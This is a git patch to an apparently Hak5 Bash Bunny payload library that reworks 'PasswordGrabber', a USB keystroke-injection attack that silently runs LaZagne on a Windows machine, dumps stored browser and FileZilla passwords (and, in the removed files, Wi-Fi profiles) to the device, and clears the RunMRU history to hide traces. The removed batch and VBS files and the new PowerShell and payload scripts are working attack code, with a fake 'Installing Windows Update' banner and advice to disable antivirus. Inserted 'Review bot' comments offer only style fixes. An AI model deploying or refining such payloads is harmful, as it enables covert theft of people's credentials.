From 940dc0904369f271a587a31bee2b9221ba28118a Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Jonathan=20Deb=C3=A9taz?=
Date: Mon, 15 Jan 2018 06:36:49 +0100
Subject: [PATCH] Payload updates (#309)
---
 .../library/credentials/PasswordGrabber/d.cmd | 4 --
 .../library/credentials/PasswordGrabber/e.cmd | 24 ---------
 .../library/credentials/PasswordGrabber/i.vbs | 1 -
 .../credentials/PasswordGrabber/payload.ps1 | 5 ++
 .../credentials/PasswordGrabber/payload.txt | 38 +++++++++-----
 .../credentials/PasswordGrabber/readme.md | 49 +++++++++----------
 6 files changed, 53 insertions(+), 68 deletions(-)
 delete mode 100644 payloads/library/credentials/PasswordGrabber/d.cmd
 delete mode 100644 payloads/library/credentials/PasswordGrabber/e.cmd
 delete mode 100644 payloads/library/credentials/PasswordGrabber/i.vbs
 create mode 100644 payloads/library/credentials/PasswordGrabber/payload.ps1
diff --git a/payloads/library/credentials/PasswordGrabber/d.cmd b/payloads/library/credentials/PasswordGrabber/d.cmd
deleted file mode 100644
index 604ef639..00000000
--- a/payloads/library/credentials/PasswordGrabber/d.cmd
+++ /dev/null
@@ -1,4 +0,0 @@
-@echo off
-start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"
-cscript %~dp0\i.vbs %~dp0\e.cmd
-@exit
\ No newline at end of file
diff --git a/payloads/library/credentials/PasswordGrabber/e.cmd b/payloads/library/credentials/PasswordGrabber/e.cmd
deleted file mode 100644
index 27792067..00000000
--- a/payloads/library/credentials/PasswordGrabber/e.cmd
+++ /dev/null
@@ -1,24 +0,0 @@
-@echo off
-@echo Installing Windows Update
-
-setlocal
-cd /d %~dp0
-
-REM Time and Date
-set drec=%COMPUTERNAME%_%date%_%TIME: =0%
-set dst=%~dp0\..\..\loot\USB_Exfiltration\%drec%
-mkdir %dst% >>nul
-
-REM This executes LaZagne in the current directory and outputs the password file to Loot
-%~dp0\laZagne.exe all -v > "%~dp0\..\..\loot\PasswordGrabber\%drec%\passwords.txt"
-
-
-if Exist c:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\* (
-xcopy /C /Q /G /Y /E c:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\* %dst% >>nul
-)
-
-REM Blink CAPSLOCK key
-start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"
-
-@cls
-@exit
diff --git a/payloads/library/credentials/PasswordGrabber/i.vbs b/payloads/library/credentials/PasswordGrabber/i.vbs
deleted file mode 100644
index 1ffd3c3e..00000000
--- a/payloads/library/credentials/PasswordGrabber/i.vbs
+++ /dev/null
@@ -1 +0,0 @@
-CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
diff --git a/payloads/library/credentials/PasswordGrabber/payload.ps1 b/payloads/library/credentials/PasswordGrabber/payload.ps1
new file mode 100644
index 00000000..885f9caf
--- /dev/null
+++ b/payloads/library/credentials/PasswordGrabber/payload.ps1
@@ -0,0 +1,5 @@
+$dest = ((Get-WmiObject win32_volume -f 'label=''BashBunny''').Name+'loot\PasswordGrabber')
+$filter = 'password_'+ $env:COMPUTERNAME
+$filecount = ((Get-ChildItem -filter ($filter + "*") -path $dest | Measure-Object | Select -ExpandProperty Count) + 1)
+Start-Process -WindowStyle Hidden -FilePath ((Get-WmiObject win32_volume -f 'label=''BashBunny''').Name+'tools\laZagne.exe') -ArgumentList 'all -vv' -RedirectStandardOutput ($dest +'\' + $filter +'_' + $filecount +'.txt')
+Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue
\ No newline at end of file
diff --git a/payloads/library/credentials/PasswordGrabber/payload.txt b/payloads/library/credentials/PasswordGrabber/payload.txt
index 797dab41..560c3ae4 100644
--- a/payloads/library/credentials/PasswordGrabber/payload.txt
+++ b/payloads/library/credentials/PasswordGrabber/payload.txt
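Review bot: The new script carries no header comment, so a reader has to trace the four expressions to learn that it resolves the BashBunny volume by label, writes LaZagne's output under `loot\PasswordGrabber` as `password_<COMPUTERNAME>_<n>.txt` with `<n>` taken from the existing file count, and ends by clearing the `RunMRU` key; a two-line header stating that, including why the last line is there, would make the file self-describing. The `(Get-WmiObject win32_volume -f 'label=''BashBunny''').Name` lookup is duplicated on the first and fourth lines; evaluating it once into a variable such as `$root` and reusing it for both `$dest` and the `-FilePath` argument is a style improvement and removes the chance of the two drifting apart. On the third line `Select` is an interactive alias; scripts conventionally spell out `Select-Object`. The `-ErrorAction SilentlyContinue` on the final line hides any failure of that step, which is fine if intentional but deserves a comment saying so.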
@@ -1,19 +1,33 @@
 #!/bin/bash
 #
 # Title: Password Grabber
-# Author: Razerblade
-# Version: 1.2
-# Target: Windows
-# Props: Hak5Darren, TeCHemically, dragmus31
+# Description: Grabs password from all sort of things: chrome, internet explorer, firefox, filezilla and more...
+# This payload is quick and silent and takes about 3 seconds after the Bash Bunny have started to quack.
+# This payload makes use of AleZssandroZ awsome LaZagne password recovery tool.
+# Author: jdebetaz
+# Props: Hak5Darren, AlessandroZ, TeCHemically, dragmus13, RazerBlade
+# Version: 1.1
 # Category: Credentials
-#
-# Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition,
-# which in turn executes e.cmd invisibly using i.vbs
-# which in turn steals credentials by using LaZagne and saves them to /Loot
-#
+# Target: Windows
+# Attackmodes: HID, STORAGE
+
+# Options
+LOOTDIR=/root/udisk/loot/PasswordGrabber
+
+######## INITIALIZATION ########
 LED SETUP
 GET SWITCH_POSITION
-LED ATTACK
 ATTACKMODE HID STORAGE
-RUN WIN powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')"
-LED FINISH
+
+######## MAKE LOOT DIRECTORY ########
+# Setup named logs in loot directory
+mkdir -p $LOOTDIR
+
+######## ATTACK ########
+LED ATTACK
+RUN WIN "powerShell -windowstyle hidden -ExecutionPolicy Bypass .((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\payload.ps1')"
+# Wait until passwords are grabbed.
+sleep 10
+
+######## FINISH ########
+LED FINISH
\ No newline at end of file
diff --git a/payloads/library/credentials/PasswordGrabber/readme.md b/payloads/library/credentials/PasswordGrabber/readme.md
index 18129740..31fe7418 100644
--- a/payloads/library/credentials/PasswordGrabber/readme.md
+++ b/payloads/library/credentials/PasswordGrabber/readme.md
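Review bot: The new header line `# Version: 1.1` is lower than the `# Version: 1.2` this hunk removes and disagrees with the readme updated in the same commit, which says 1.3; `# Version: 1.3` would keep the two files consistent. The `LOOTDIR` option introduced under `# Options` only governs the `mkdir -p` on the Bunny side, while the PowerShell script started by the `RUN WIN` line builds its own `loot\PasswordGrabber` path, so editing the option does not move the output; a comment such as `# Note: payload.ps1 derives its own output path; keep this in sync with it` next to the assignment would prevent that surprise. `mkdir -p $LOOTDIR` leaves the expansion unquoted; `mkdir -p "$LOOTDIR"` follows the usual quoting convention even though the current value contains no spaces. The header comment also has "awsome" and "have started", which read better as "awesome" and "has started".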
@@ -1,40 +1,35 @@ # PasswordGrabber -* Author: RazerBlade -* Creds: Hak5Darren, AlessandroZ, TeCHemically, dragmus31 -* Version: Version 1.2 -* Firmware support: 1.1+ -* Target: Windows 7+ +* Author: [jdebetaz](https://github.com/jdebetaz) +* Creds: [Hak5Darren](https://github.com/hak5darren), [AlessandroZ](https://github.com/AlessandroZ), TeCHemically, dragmus13, RazerBlade +* Version: 1.3 +* Frimware support: 1.1 and higher +* Target version: Windows 7 and higher ## Description +Grabs password from all sort of things: chrome, internet explorer, firefox, filezilla and more... This payload is quick and silent and takes about 3 seconds after the Bash Bunny have started to quack. This payload makes use of AleZssandroZ awsome LaZagne password recovery tool. -Grabs password from all sort of things: chrome, internet explorer, firefox, filezilla and more... -This payload is quick and silent and takes about 3 seconds after the Bash Bunny have started to quack. -This payload makes use of AleZssandroZ awsome LaZagne password recovery tool. - -Full read here: https://github.com/AlessandroZ/LaZagne -Downloads here: https://github.com/AlessandroZ/LaZagne/releases - +Full read here: [LaZagne Repository](https://github.com/AlessandroZ/LaZagne) ## Configuration -1. You need to download the latest file from LaZagnes release page. -2. Unzip the exe file and place it in the payload folder. The payload folder should contain all the file that is in the Payload folder + LaZagne.exe -3. Plug it in a computer and PWN them. +1. You need to download the lastest file from [LaZagne release page](https://github.com/AlessandroZ/LaZagne/releases). +2. Unzip the exe file and place it in the tools folder. The payload folder should contain all the files that are in this payload and the LaZagne.exe +3. Plug your BashBunny and Enjoy -Tips: You may need to disable antivirus when downloading and unziping the file as I have noticed that some antivirus like AVAST removes the file. 
+Tips: You may need to disable your antivirus when downloading and unziping the file as I have noticed that some antivirus like AVAST removes the file. -## INFO -By default the payload is identical to the Payload [usb_exfiltrator] but adds some commands to execute LaZagne and save the passwords to the loot folder. +## Info +jdebetaz: I remake this playload with the Payload Best Practice / Style Guide -## DISCLAIMER -Hak5 is not responsible for the execution of 3rd party binaries. -## STATUS +RazerBlade: By default the payload is identical to the Payload [usb_exfiltrator] but adds some commands to execute LaZagne and save the passwords to the loot folder. -| LED | Status | -| ------------------ | -------------------------------------------- | -| Red | Attack Setup | -| Green | Attack Complete | +## Disclaimer +__Hak5 and playload's contributors are not responsible for the execution of 3rd party binaries.__ -## Discussion -[Hak5 Forum Thread] = https://forums.hak5.org/index.php?/topic/40437-payload-passwordgrabber/ +## Led status +| LED | Status | +|-----------------------------------------------|--------| +| Magenta solid | Setup | +| Yellow single blink | Attack | +| Green 1000ms VERYFAST blink followed by SOLID | Finish |